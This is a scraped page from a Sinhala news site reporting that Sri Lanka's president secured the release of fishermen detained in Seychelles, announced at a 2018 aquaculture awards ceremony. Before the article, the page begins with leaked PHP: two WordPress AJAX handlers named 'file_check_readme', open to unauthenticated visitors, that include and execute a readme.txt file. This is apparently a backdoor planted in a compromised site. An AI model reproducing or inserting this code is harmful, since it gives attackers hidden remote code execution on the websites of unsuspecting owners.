if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ලොවම දිනමින් යන ජනපති සීෂෙල්ස් රාජ්‍යත් දිනාගනී.. සිරගත කර සිටි ධීවරයන් බේරාගනී.. - mediahumanrights.lk
mediahumanrights.lk
News Political

ලොවම දිනමින් යන ජනපති සීෂෙල්ස් රාජ්‍යත් දිනාගනී.. සිරගත කර සිටි ධීවරයන් බේරාගනී..

සීෂෙල්ස් රාජ්‍යයට අයත් මුහුදු සීමාවේ මසුන් ඇල්ලීමට ගොස් අත්අඩංගුවට පත් වූ ශ‍්‍රී ලාංකික ධීවරයන් සියලූ දෙනා නිදහස් කර ගැනීමට සීෂේල්ස් ජනාධිපතිවරයා සහ තමා අතර පැවති සාකච්ඡුාවල ප‍්‍රතිඵලයක් ලෙස හැකියාව ලැබුණු බව ජනාධිපතිතුමා පවසයි.
එම සාකච්ඡුාවල දී පැමිණි එකගතාව අනුව එම සියලූ ධීවරයන් අද දහවල් නිදහස ලැබූ බව ද ජනාධිපතිතුමා සදහන් කළේ 10 පස්වරුවේ කොළඹ බණ්ඩාරනායක ජාත්‍යන්තර සම්මන්ත‍්‍රණ ශාලාවේ පැවති ,මිරිදිය වරුණ 2018, සම්මාන ප‍්‍රදානෝත්සවය අමතමිනි.
ධීවර කර්මාන්තය සහ ධීවර ප‍්‍රජාව මේ රටේ ශක්තිමත් බලවේගයක් බව මෙහි දී පෙන්වා දුන් ජනාධිපතිතුමා ඔවුන් දුර්වල කිරීමට රජය කිසිදු අවස්ථාවක සූදානම් නොමැති බවත්, ධීවර කර්මාන්තයේ උන්නතිය වෙනුවෙන් ඉටු කළ යුතු සෑම වගකීමක් ම නොපිරිහෙළා ඉටු කරන බවත් අවධාරණය කළේ ය.
මෙහි දී අදහස් දැක්වූ ජනාධිපතිතුමා වැඩිදුරටත් පෙන්වා දුන්නේ ධීවර කර්මාන්තය සහ ධීවර ප‍්‍රජාවගේ සුබසාධනය වෙනුවෙන් පසුගිය සියලූ රජයන්ට වඩා වැඩි මුදලක් වෙන් කිරීමට වත්මන් රජය කටයුතු කර තිබෙන බව යි.
ධීවර ප‍්‍රජාව වෙනුවෙන් කි‍්‍රයාත්මක නිවාස යෝජනා ක‍්‍රමය ඉදිරියේ දී තව තවත් ශක්තිමත් කරන බව ද ජනාධිපතිතුමා ස`දහන් කළේ ය.
ග‍්‍රාමීය ධීවර සංවිධාන විසින් මෙහි දී ජනාධිපතිතුමා වෙත විශේෂ සංදේශයක් ද භාර දුන් අතර ජලාශවලට අවශ්‍ය මත්ස්‍ය පැටව් බහාලීම වැඩි කිරීම, ධීවර ආම්පන්න ලබා ගැනීම, ජල ජීවි වගාවන් ස`දහා රජයේ ඉඩම් ලබා ගැනීම, ජලාශවල විධිමත් කළමනාකරණය ස`දහා නිලධාරින් යෙදවීම, ධීවර කර්මාන්තය ස`දහා අවශ්‍ය යටිතල පහසුකම් සහ මූල්‍ය ප‍්‍රතිපාදන ලබාදීම ඇතු`ථ එම සියලූ ඉල්ලීම් කඩිනමින් ඉටු කිරීමට පියවර ගන්නා බව ප‍්‍රකාශ කළ ජනාධිපතිතුමා එම ඉල්ලීම් ඉටු කිරීම ඇතු`ථ කර්මාන්තයේ උන්නතිය වෙනුවෙන් වැඩි මුදලක් මෙවර අය වැය තුළින් වෙන් කිරීමට කටයුතු කරන බව ස`දහන් කළේ ය.සමස්ත මිරිදිය ජීවි හා ජලජීවි වගා ප‍්‍රජාව ඇගැයීම වෙනුවෙන් ශ‍්‍රී ලංකා ජාතික ජලජීවි වගා සංවර්ධන අධිකාරිය මගින් මෙම සම්මාන ප‍්‍රදානෝත්සවය සංවිධානය කරනු ලබයි.
ඒ අනුව මෙහි විවිධ අංශයන් යටතේ දක්ෂතා හා කැපී පෙනෙන සංවර්ධනයක් පෙන්වූ ධීවරයන් හා ජලජීවි වගාකරුවන් වෙනුවෙන් සම්මාන පිරිනැමීම ජනාධිපතිතුමා අතින් සිදු විය.
ධීවර ප‍්‍රජාව වෙත ධීවර යාත‍්‍රා සහ දැල් ආම්පන්න ප‍්‍රදානය කිරීමට අදාළ හිම්කම් පත‍්‍ර ප‍්‍රදානය කිරීම ද ජනාධිපතිතුමා අතින් සිදු කෙරිණි.
ධීවර ප‍්‍රජාව විසින් ජනාධිපතිතුමා වෙත ද විශේෂ උපහාර තිළිණයක් පිළිගන්වන ලදී.
ධීවර හා ජල සම්පත් සංවර්ධන අමාත්‍ය විජිත් විජයමුණි ද සොයිසා, රාජ්‍ය අමාත්‍ය දිලීප් වෙදආරච්චි, නියෝජ්‍ය අමාත්‍ය අමීර් අලී යන මහත්වරුන් ද, ශ‍්‍රී ලංකා ජාතික ජලජීවි වගා සංවර්ධන අධිකාරියේ සභාපති නුවන් ප‍්‍රසන්න මදවන්ආරච්චි මහතා ඇතු`ථ නිලධාරින් සහ දිවයිනේ නන් දෙසින් පැමිණි ධීවර ජනතාව විශාල පිරිසක් මෙම අවස්ථාවට එක්ව සිටියහ.
– ජනාධිපති මාධ්‍ය අංශය

(under the courtesy of lankacnews.com news web)

Related posts

ක‍්‍රිකට් ගැටුම් උග‍්‍රවෙයි.. ක‍්‍රිනට් ආයතනය කලමණාකාරුට කුණු බැණුම් බනී..

Shiran Viraj

Travel News – How this family of 3 can afford to travel the world year-round

Shiran Viraj

ලැබුණු, නොලැබුණු, වැරැදුණු බොහෝ දේ ගැන ධනුෂ්ක කියන කතා

Shiran Viraj